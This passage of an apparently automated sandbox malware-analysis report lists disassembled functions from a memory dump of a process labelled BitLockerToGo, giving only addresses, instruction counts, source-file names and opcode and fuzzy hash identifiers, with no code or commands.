                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5c12fcaa893704ba3a3abf2a1d9b2e78b5fd7c594974b0ad341749cb65ae105
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39C15BB29487418FC360CF28DC86BABB7E1BF85318F09492DD1DAD6342E778A155CB46
                                                                                                                                                                                                            Function 00428100 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
                                                                                                                                                                                                            • Instruction ID: 7060ff257f1d57e8326384c3aaed6f283346be69202c19536aca7bdb8c3aaad4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0815774E04224CBDF20CF54D8916AF73B1FF55310F18819DD8856B385E7389912CBA9
                                                                                                                                                                                                            Function 00432800 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
                                                                                                                                                                                                            • Instruction ID: 1303130b957ef33d10d9c1787a5ad37353acd530864993bbcf8375f38532070f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3812637749A800BD32CAD7D4C522A6B9835BDA330F3DD37EA5B18B3E5E9A848025345
                                                                                                                                                                                                            Function 0043FE20 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
                                                                                                                                                                                                            • Instruction ID: 0bfc5a374a60af3586e218f93e2c2928d82f03b66c5554fb0b2c1f037090387e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC911435A083019FE714CF18D891A2BB3E2EFD9710F19952DEA858B3A5DB35DC11CB4A
                                                                                                                                                                                                            Function 004390A0 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
                                                                                                                                                                                                            • Instruction ID: b66e43f3b97cf1dfe37cda8ef161d74f150199c18f2f0b2dd8126107ca88f700
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C77134756482009BE7148F29DC8172F73A6EFC9304F19983EE68657296DB788C01DB5A
                                                                                                                                                                                                            Function 0043C1B0 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
                                                                                                                                                                                                            • Instruction ID: b6c6c0bb9063e71726147574d8d4a9f3fa072b62720395db4690d828467e09fc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B613432F442108BD7209F69D8C126BB7A2ABD9320F1E953ED8C4B7315D6799C5287C6
                                                                                                                                                                                                            Function 0042895A Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
                                                                                                                                                                                                            • Instruction ID: fd324c467d0d4d67cb19f0be7c245ecd171908bcd495dc43fa11a230d99e3a73
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D61E7B5E01226CBCB148F54C861ABEB7B1FF56310F19829DD8466F391E7389841CB98
                                                                                                                                                                                                            Function 0042CA35 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 596c9a500c2b211e0bede0dc7108b3830e98fe79128f0a5cf5a6a8000d0bd306
                                                                                                                                                                                                            • Instruction ID: 9cae756e44e46e412c6b7bae4618893f63236fa384344dc74c3a447ed554000f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 596c9a500c2b211e0bede0dc7108b3830e98fe79128f0a5cf5a6a8000d0bd306
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4761597020C3A18BD3198B3694A077F7FD09F97314F684A9EE4D65B381D6388946C79A
                                                                                                                                                                                                            Function 0042CAF1 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f4616abc86f5eec50a33f05d8b81670d6b12a01ee44a15341e545930cacdef31
                                                                                                                                                                                                            • Instruction ID: 91ec8ecf55fe5685fb4db376a75285eb36e4341672459a1fb700e153c465ee75
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4616abc86f5eec50a33f05d8b81670d6b12a01ee44a15341e545930cacdef31
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25616B7020C3A18BD3198F3694E077F7FD09F97714F684A9EE4C65B282D6388546C79A
                                                                                                                                                                                                            Function 0042CB4C Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 74faaaf9cd24d676a092b8e6f9ac3efb77d7115b5d8593a4af48d1d83e65560f
                                                                                                                                                                                                            • Instruction ID: a090848f6cc525cad24b9e20c821547faca872518ba63d46f27936152a4cd5de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74faaaf9cd24d676a092b8e6f9ac3efb77d7115b5d8593a4af48d1d83e65560f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73517C7020C3A14BD3198B3694E077F7FD09F97718F684A5EE4C65B281C6388546C79A
                                                                                                                                                                                                            Function 004308E0 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
                                                                                                                                                                                                            • Instruction ID: 5b2891c8fe877119163b7f98e476f77a68e93a46c016bb1ad212271ab8b7413a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97717A37649AD04BE3285E7C4C713A6BA934F97630F2D936EE9F54B3E2C5684D028345
                                                                                                                                                                                                            Function 0041D940 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
                                                                                                                                                                                                            • Instruction ID: 469687be043b2f9f4970facd4e4c08c479ec777d83b0675a84ba9d55084d64b3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18711573A4D9904BD328893C4C123AA6E934BD3334F2DC3AEE5B6873E5D56D48428349
                                                                                                                                                                                                            Function 0042F7BC Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
                                                                                                                                                                                                            • Instruction ID: a7f5e9c046c4957bb4a88c91f70171074d68fbe3518662ea52ef9577db1fb83e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DA1A161608FC08BD3159A3898943E7BFE25FA6324F188A7DD4FE473C6D678A409C716
                                                                                                                                                                                                            Function 0041AB00 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: db39e290813564dad3724b79deb140b57ce3141e843a651e9f5f344617681626
                                                                                                                                                                                                            • Instruction ID: 10fdaf47f6b14bfbe331076cd5057ec1334350043aed3e0252b47af58e088c01
                                                                                                                                                                                                            • Opcode Fuzzy Hash: db39e290813564dad3724b79deb140b57ce3141e843a651e9f5f344617681626
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44613633B4AA804BD728CD3C5C513A67A930BD7330B2EC77EE6B58B3E5E56848524346
                                                                                                                                                                                                            Function 00432B10 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c1684320cec7a9cf7998564e3e50963ad1a149a90c03f316f8258aba6f7eab80
                                                                                                                                                                                                            • Instruction ID: 531981158a6f9b00caa3a14850ce91ceb08ed0e88ac49b002fa73ad3765a9f98
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1684320cec7a9cf7998564e3e50963ad1a149a90c03f316f8258aba6f7eab80
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56612733B149A14BC7288D3C4C112BEBA534B9A330F2E937BE975DB3E5C5684D014394
                                                                                                                                                                                                            Function 00437DE0 Relevance: .2, Instructions: 189COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
                                                                                                                                                                                                            • Instruction ID: d2a2c762938f2fca4047324f4a8cb11edca21d1421b4f064fd9b2157b6ab5b48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD515BB15087548FE324DF29D49475BBBE1BBC8318F044A2EE4E987351E779DA088F86
                                                                                                                                                                                                            Function 0042F166 Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
                                                                                                                                                                                                            • Instruction ID: e7deeb4d23eb94cd92ae027c1703fd029eee9cb96ffdb6be6668117e96043695
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96f01cf5a4a5fbc66146bff0ed73f2f4746840b49c526372884732bc62a942db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B71AF72605F808BD3289B398895397BBE2AFDA324F18CB6CD5FE873D5D63864058711
                                                                                                                                                                                                            Function 0041DC90 Relevance: .2, Instructions: 173COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
                                                                                                                                                                                                            • Instruction ID: a4a710428683e853f361a46b908238cf8c95490b240be794243bc07d83d7b904
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9d65a63d55dc101dab8d648e93d62fc17e84a733771b803c98110a43d2c3e35
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82512872B49AD14BD32C8A3C5C202E67A930BE7230B2CC77FE5B18B3E9D5594C428349
                                                                                                                                                                                                            Function 0042FDF9 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
                                                                                                                                                                                                            • Instruction ID: 91e01f7b1b83310294adf70ec6e42733a2de4c40d7ccdc23475bec5239df35d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83e0a7b5798f50e51a594fe464790eb165e5a3dc9801e69e9e1483218ce4d000
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3661E372709F804FD3258A3888943EBBBD25BD6224F598B7DD5FB473C6DA3864068712
                                                                                                                                                                                                            Function 0043EA80 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
                                                                                                                                                                                                            • Instruction ID: 923e9729d5fc7ee5fd359d95a093cefa7cc461975f18bb850f02f0498ccbdfb7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2413D32B183604BC724CF39889112BF7D69BCA204F19993EDCD6DB386D634ED068785
                                                                                                                                                                                                            Function 0040D0FF Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 77174489fd0e67cff2231ae8560aed0271b4bae09d9f29f2eb73219c18e69b4e
                                                                                                                                                                                                            • Instruction ID: d0b61d9f81aa32698d78d86dd344cd119e6c94a8a483ab8c1dfd674f7c89a8c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77174489fd0e67cff2231ae8560aed0271b4bae09d9f29f2eb73219c18e69b4e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2312A34A8A2009BD7198B68D4A193B77E1EF9E704F55183EC08773761C2369C07CB8A
                                                                                                                                                                                                            Function 00437300 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 31087603f6955c680b53001b2ded55fee9e1317aa71b55b8ead82521f35e458b
                                                                                                                                                                                                            • Instruction ID: 8d910ab3725aef525df7cf3e8056221471cb78519a605af281f7b590cc56def2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31087603f6955c680b53001b2ded55fee9e1317aa71b55b8ead82521f35e458b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7518F72E082558BD718CF68CC913AE7BE2AB99314F19C17DC491EB392D63C9901CB85
                                                                                                                                                                                                            Function 00436554 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 443ba3fedd39c938272fbcc842cb084585534cd99fa60a876ac0daf18ed5a58c
                                                                                                                                                                                                            • Instruction ID: b29ca845dee0bd9e57349eb0122d191b14dd0e5c106a5fdaa3ab53071bb3bc5b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 443ba3fedd39c938272fbcc842cb084585534cd99fa60a876ac0daf18ed5a58c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE512872E046568FEB04CF78CD9139EBBE2AB89314F1EC17DC451AB385DA7C89428B45
                                                                                                                                                                                                            Function 004398A0 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
                                                                                                                                                                                                            • Instruction ID: 0b4fe86eeb8762ab361a5b54057d890833e111ea9fd28b0abc4707cf8fce0a7e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C417CB2A043006BE7109E15DC41B3BB7A9DFC4704F19543DF98693351D679EC00C69B
                                                                                                                                                                                                            Function 0041AD80 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
                                                                                                                                                                                                            • Instruction ID: 98624231f7e5e9230921b97ae011ab3bf41f8733fbbdbc26380a3e149101f663
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 893197B01493418BC714DF29D8616ABBBF1EF83364F144A1DE5D28B390E778C881CB8A
                                                                                                                                                                                                            Function 004088F0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
                                                                                                                                                                                                            • Instruction ID: c2a8606713259396baf07b6ed49a93c0e34875c4cdcf46c8cf9c9e6fbb1e3583
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331A773B219114BD310CA29CD447A232929BD8328F3E86B9D865DB7D6DD3BAC0386C0
                                                                                                                                                                                                            Function 0043150E Relevance: .1, Instructions: 120COMMON
